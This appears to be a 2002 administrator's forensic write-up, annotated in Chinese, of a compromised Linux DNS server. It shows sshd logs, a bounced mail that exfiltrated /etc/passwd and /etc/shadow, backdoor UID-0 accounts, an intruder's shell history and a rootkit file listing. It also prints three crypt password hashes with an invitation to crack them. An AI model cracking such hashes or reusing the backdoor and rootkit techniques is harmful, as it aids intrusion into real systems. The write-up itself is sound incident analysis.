  Jan 21 18:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA
  key.
  Jan 21 18:17:41 dnscache sshd[270]: log: RSA key generation complete.
  Jan 21 19:00:16 dnscache sshd[23334]: log: Connection from 80.96.178.195
  port 1519
  Jan 21 19:00:16 dnscache sshd[23334]: log: Could not reverse map address
  80.96.178.195.
  Jan 21 19:00:25 dnscache sshd[23334]: log: Password authentication for
  operator accepted.
  
  From root Mon Jan 21 20:01:02 2002
  Return-Path:
  Received: (from root@localhost)
  by dnscache.i-168.com (8.9.3/8.9.3) id UAA29460
  for root; Mon, 21 Jan 2002 20:01:01 +0800
  Date: Mon, 21 Jan 2002 20:01:01 +0800
  From: root
  Message-Id: <200201211201.UAA29460@dnscache.i-168.com>
  To: root@dnscache.i-168.com
  Subject: dnscache.i-168.com 01/21/02:20.01 system check
  
  
  Unusual System Events
  =-=-=-=-=-=-=-=-=-=-=
  Jan 21 19:01:54 dnscache sshd[23334]: fatal: Read error from remote
  host: Connection reset by peer
  Jan 21 19:13:33 dnscache sshd[23975]: log: Connection from 80.96.178.194
  port 2406
  Jan 21 19:13:33 dnscache sshd[23975]: log: Could not reverse map address
  80.96.178.194.
  Jan 21 19:13:44 dnscache sshd[23975]: log: Password authentication for
  operator accepted.
  Jan 21 19:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA
  key.
  有新机器进来呢,FT,不是好兆头
  
  重启
  From root Mon Jan 21 23:01:00 2002
  Return-Path:
  Received: (from root@localhost)
  by dnscache.i-168.com (8.9.3/8.9.3) id XAA00309
  for root; Mon, 21 Jan 2002 23:01:00 +0800
  Date: Mon, 21 Jan 2002 23:01:00 +0800
  From: root
  Message-Id: <200201211501.XAA00309@dnscache.i-168.com>
  To: root@dnscache.i-168.com
  Subject: dnscache.i-168.com 01/21/02:23.01 system check
  
  
  
  Feb 2 07:28:18 dnscache sshd[1991]: log: Connection from 24.112.92.
  135 port 3854
  Feb 2 07:28:21 dnscache sshd[1992]: log: Connection from 24.112.92.
  135 port 3855
  Feb 2 07:28:30 dnscache sshd[1992]: fatal: Local: crc32 compensation
  attack: network attack detected
  Feb 2 07:28:31 dnscache sshd[1993]: log: Connection from 24.112.92.
  135 port 3856
  Feb 2 07:28:34 dnscache sshd[1993]: fatal: Local: crc32 compensation
  attack: network attack detected
  Feb 2 07:28:34 dnscache sshd[1994]: log: Connection from 24.112.92.
  135 port 3857
  Feb 2 07:28:39 dnscache sshd[1994]: fatal: Local: crc32 compensation
  attack: network attack detected
  Feb 2 07:28:40 dnscache sshd[1995]: log: Connection from 24.112.92.
  135 port 3858
  Feb 2 07:28:44 dnscache sshd[1995]: fatal: Local: crc32 compensation
  attack: network attack detected
  Feb 2 07:28:46 dnscache sshd[1996]: log: Connection from 24.112.92.
  135 port 3859
  Feb 2 07:28:49 dnscache sshd[1996]: fatal: Local: crc32 compensation
  attack: network attack detected
  Feb 2 07:28:49 dnscache sshd[1997]: log: Connection from 24.112.92.
  135 port 3860
  Feb 2 07:28:54 dnscache sshd[1997]: fatal: Local: crc32 compensation
  attack: network attack detected
  Feb 2 07:28:55 dnscache sshd[1998]: log: Connection from 24.112.92.
  135 port 3861
  Feb 2 07:28:59 dnscache sshd[1998]: fatal: Local: crc32 compensation
  attack: network attack detected
  Feb 2 07:28:59 dnscache sshd[1999]: log: Connection from 24.112.92.
  135 port 3862
  Feb 2 07:29:05 dnscache sshd[1999]: fatal: Local: crc32 compensation
  attack: network attack detected
  Feb 2 07:29:06 dnscache sshd[2000]: log: Connection from 24.112.92.
  135 port 3863
  Feb 2 07:29:09 dnscache sshd[2000]: fatal: Local: crc32 compensation
  attack: network attack detected
  Feb 2 07:29:10 dnscache sshd[2001]: log: Connection from 24.112.92.
  135 port 3864
  Feb 2 07:29:15 dnscache sshd[2001]: fatal: Local: crc32 compensation
  attack: network attack detected
  From root Sat Feb 2 08:09:26 2002
  Return-Path:
  Received: from localhost (localhost)
  by dnscache.i-168.com (8.9.3/8.9.3) with internal id IAA02520;
  Sat, 2 Feb 2002 08:09:25 +0800
  Date: Sat, 2 Feb 2002 08:09:25 +0800
  From: Mail Delivery Subsystem
  Message-Id: <200202020009.IAA02520@dnscache.i-168.com>
  To: root@dnscache.i-168.com
  MIME-Version: 1.0
  Content-Type: multipart/report; report-type=delivery-status;
  boundary="IAA02520.1012608565/dnscache.i-168.com"
  Subject: Returned mail: Service unavailable
  Auto-Submitted: auto-generated (failure)
  
  This is a MIME-encapsulated message
  
  --IAA02520.1012608565/dnscache.i-168.com
  
  The original message was received at Sat, 2 Feb 2002 08:09:22 +0800
  from root@localhost
  
  ----- The following addresses had permanent fatal errors -----
  ja_ja_j@yahoo.com
  
  ----- Transcript of session follows -----
  ... while talking to mx2.mail.yahoo.com.:
  > >> DATA
  < 554 delivery error: dd This user doesn't have a yahoo.com account
  (ja_ja_j@yahoo.com) - mta619.mail.yahoo.c
  om
  554 ja_ja_j@yahoo.com... Service unavailable
  --IAA02520.1012608565/dnscache.i-168.com
  Content-Type: message/delivery-status
  
  Reporting-MTA: dns; dnscache.i-168.com
  Arrival-Date: Sat, 2 Feb 2002 08:09:22 +0800
  
  Final-Recipient: RFC822; ja_ja_j@yahoo.com
  Action: failed
  Status: 5.0.0
  Remote-MTA: DNS; mx2.mail.yahoo.com
  Diagnostic-Code: SMTP; 554 delivery error: dd This user doesn't have a
  yahoo.com account (ja_ja_j@yahoo.com) -
  mta619.mail.yahoo.com
  Last-Attempt-Date: Sat, 2 Feb 2002 08:09:25 +0800
  
  --IAA02520.1012608565/dnscache.i-168.com
  Content-Type: message/rfc822
  
  Return-Path:
  Received: (from root@localhost)
  by dnscache.i-168.com (8.9.3/8.9.3) id IAA02513
  for ja_ja_j@yahoo.com; Sat, 2 Feb 2002 08:09:22 +0800
  Date: Sat, 2 Feb 2002 08:09:22 +0800
  From: root
  Message-Id: <200202020009.IAA02513@dnscache.i-168.com>
  To: ja_ja_j@yahoo.com
  Subject: Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST
  2001 i686 unknown
  
  Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST 2001 i686
  unknown
  |------
  root:x:0:0:root:/root:/bin/bash
  bin:x:1:1:bin:/bin:
  daemon:x:2:2:daemon:/sbin:
  adm:x:3:4:adm:/var/adm:
  lp:x:4:7:lp:/var/spool/lpd:
  sync:x:5:0:sync:/sbin:/binsync
  shutdown:x:6:0:shutdown:/sbin:/sbinshutdown
  halt:x:7:0:halt:/sbin:/sbinhalt
  mail:x:8:12:mail:/var/spoolmail:
  news:x:9:13:news:/var/spoolnews:
  uucp:x:10:14:uucp:/var/spooluucp:
  operator:x:11:0:operator:/root:
  games:x:12:100:games:/usrgames:
  gopher:x:13:30:gopher:/usr/libgopher-data:
  ftp:x:14:50:FTP User:/home/ftp:
  nobody:x:99:99:Nobody:/:
  wnn:x:127:127:Wnn:/usr/local/bin/Wnn6:
  哪里来的SHELL?又是后门,FT!
  mysql:x:128:128:MySQL server:/var/lib/mysql:/binbash
  bind:x:129:129::/etc/named:/dev/null
  piranha:x:60:60::/home/httpd/html/piranha:/dev/null
  squid:x:23:23::/var/spool/squid:/dev/null
  chair:x:500:503::/home/chair:/bin/bash
  dnscache:x:501:504::/home/dnscache:/binbash
  dnslog:x:502:505::/home/dnslog:/binbash
  cgi:x:0:0::/home/cgi:/bin/bash
  家伙1
  luck:x:503:506::/home/luck:/bin/bash
  家伙2
  luck1:x:0:507::/home/luck1:/bin/bash
  家伙3|------
  root:XXXXXXXXX.:11649:0:99999:7::: 保密啦
  bin:*:11649:0:99999:7:::
  daemon:*:11649:0:99999:7:::
  adm:*:11649:0:99999:7:::
  lp:*:11649:0:99999:7:::
  sync:*:11649:0:99999:7:::
  shutdown:*:11649:0:99999:7:::
  halt:*:11649:0:99999:7:::
  mail:*:11649:0:99999:7:::
  news:*:11649:0:99999:7:::
  uucp:*:11649:0:99999:7:::
  operator:XXXXXXXXXX:11708:0:99999:7:-1:-1:134539376
  games:*:11649:0:99999:7:::
  games:*:11649:0:99999:7:::
  gopher:*:11649:0:99999:7:::
  ftp:*:11649:0:99999:7:::
  nobody:*:11649:0:99999:7:::
  wnn:*:11649:0:99999:7:::
  mysql:!!:11649:0:99999:7:::
  bind:!!:11649:0:99999:7:::
  piranha:!!:11649:0:99999:7:::
  squid:!!:11649:0:99999:7:::
  chair:XXXXXXXXX:11649:0:99999:7:-1:-1:134539416 保密啦
  dnscache:!!:11649:0:99999:7:::
  dnslog:!!:11649:0:99999:7:::
  cgi:5DnRYHyIa5w0g:11708:0:99999:7:-1:-1:134539416
  luck:SqXj0pjOPwcxA:11720:0:99999:7:-1:-1:134538336
  luck1:cqrTW5Ortfn7s:11720:0:99999:7:-1:-1:134538336
  这几个就是他们的3DES后的东西,哪位朋友有时间和兴趣就CRACK了他吧
  PING 216.115.108.245 (216.115.108.245) from 192.168.100.27 : 56(84)
  bytes of data.
  64 bytes from 216.115.108.245: icmp_seq=0 ttl=233 time=167.9 ms
  64 bytes from 216.115.108.245: icmp_seq=1 ttl=233 time=170.7 ms
  64 bytes from 216.115.108.245: icmp_seq=2 ttl=233 time=171.2 ms
  64 bytes from 216.115.108.245: icmp_seq=3 ttl=233 time=174.6 ms
  64 bytes from 216.115.108.245: icmp_seq=4 ttl=233 time=171.0 ms
  
  --- 216.115.108.245 ping statistics ---
  5 packets transmitted, 5 packets received, 0% packet loss
  round-trip min/avg/max = 167.9/171.0/174.6 ms
  
  下面是 /home/luck/ 目录下的内容。看来对方也不够细心,又留下了线索:
  从历史记录看是改了内核,这家伙在这里倒考虑得周到,是怕
  我重新编译内核??
  [root@mail luck]# cat .bash_history
  cd /usr/src
  ls
  cd star
  ls
  cd S*
  ls
  tar -zxpvf *
  ls
  cd root
  ls
  l
  ls
  cd ls
  ls
  ls -af
  ls
  cd ..
  ls
  cd etc
  ls
  cd ..
  ls
  cd boot
  ls
  cd ..
  ls
  cd boto
  ls -af
  cd ..
  ls
  cd root
  ls
  ls -af
  cd ..
  ls
  rm * -rf
  ls
  tar -zxpvf *
  ls
  cd ske
  ls
  ls -af
  vi .X*
  ls
  ls -af
  ls
  ls -af
  rm .X*
  LS
  ls
  rm * -rf
  ls
  ls -af
  ls
  ls -af
  vi .x*
  ls
  ls -af
  rm .x*
  ls
  ls -af
  vi .inputrc
  ls
  ls -af
  vi .bashrc
  ls -af
  rm .g*
  rm .gnome*
  rm .gnome* -rf
  ls
  ls -af
  rm .kde*
  ls
  ls -af
  mv
  mc
  ls
  ls -af
  rm .net*
  rm .net* -rf
  ls -af
  mc
  ls
  ls -af
  cp -r .* /root
  y
  cd /
  ls
  cd usr
  ls
  cd src
  ls
  cd ..
  ls
  cd ..
  ls
  cd usr
  ls
  cd src
  ls
  cd tar
  l
  s
  ls
  cd S&*
  cd S*
  LS
  ls
  mount /dev/hdd /mnt/cdrom
  cd /mnt/cdrom
  ls
  cd S*
  ls
  ls f*
  rpm -i filesys*
  cd ..
  ls *ske*
  ls
  cd S*
  ls
  ls *ske*
  rpm -i *ske*
  cd ..
  cd /
  ls
  cd root
  ls
  ls -af
  cd ..
  mv root rootstar
  mkdir root
  cd root
  ls -af
  cd ..
  ls
  cd rootstar
  ls
  ls -af
  cd ..
  ls
  rm root -rf
  ls
  mkdir root
  ls
  cd root
  ls -af
  ls -a
  ls .
  rm ske -rf
  ls
  ls -af
  rm skel -rf
  ls
  ls -af
  ls
  vi
  ls
  ROOTKIT 里的文件,FT,几乎把常用命令都替换周全了;可惜啊,这些常用的
  东西网管又怎么会信任呢,通常自己都另有一套干净的工具啦。
  [root@mail rk]# ls
  Makefile.non-smp cleaner.c hostkey logrc ps
  tcpd
  Makefile.smp dir ifconfig ls pstree
  top
  adore.c dummy.c iferc netstat rename.c
  twist2open
  afbackup exec-test.c install netstatrc seed
  ava.c exec.c libinvisible.c network sshd_conf
  bnc filerc libinvisible.h parser syslogd
  bnc.conf find logcleaner procrc sz
